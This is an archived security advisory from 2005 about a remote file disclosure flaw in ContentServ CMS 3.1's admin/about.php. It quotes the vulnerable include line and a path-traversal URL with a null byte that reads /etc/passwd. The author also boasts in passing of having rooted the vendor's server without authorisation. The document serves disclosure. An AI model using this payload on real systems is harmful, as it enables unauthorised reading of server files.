what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

contentServ.txt

contentServ.txt
Posted Sep 26, 2005
Authored by qobaiashi

The ContentServ CMS allows for remote file disclosure. Exploitation details provided.

tags | exploit, remote
SHA-256 | 7f023ffca1207787da7967c8d5fbee488ab07f7b2629827e0b3f0fd32b87fb26

contentServ.txt

Change Mirror Download
----------------------------------------------------------------------
--[ ContentServ (still) features remote reading of arbitrary files ]--
-------------------------[ qobaiashi@gmx.net ]------------------------

/* Boring PHP bug warning:
* """"""""""""""""""""""""""""""
* By reading boring PHP bug advisories it is possible to
* fall asleep (if not affected) instantly w/o a warning!
*
* I told you, it's your decision now.
*/

ContentServ is a cms developed by ... ContentServ.de and is a quite
commonly used cms system at least in .de.

Some months ago while pentesting www.contentserv.com i've found a bug
(yo alex i rooted you back then but somehow you didn't need sec support)
in ContentServ 3.1. which - to my surprise - is still accessible on some
installations. Somebody should have read the apache logs over there ;)
I had some fun with it (the bug and your server) back then.

The bug resides in /admin/about.php:
[...]
include("../$ctsWebsite/data/config.php");
[...]


This boils down to a damn stupid:

www.we-cant-design-our-hp.com/contentserv/3.1/admin/about.php?
ctsWebsite=../../../../../../../../../../etc/passwd%00

to give you some informations.

-----------------------------
Disclosure timeline:

Bug found: 2004
Bug disclosed: Son Sep 25 16:04:40 CEST 2005
Bug fixed: ask your vendor

have fun.
-q
Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    3 Files
  • 8
    May 8th
    4 Files
  • 9
    May 9th
    54 Files
  • 10
    May 10th
    12 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    17 Files
  • 14
    May 14th
    11 Files
  • 15
    May 15th
    17 Files
  • 16
    May 16th
    13 Files
  • 17
    May 17th
    22 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close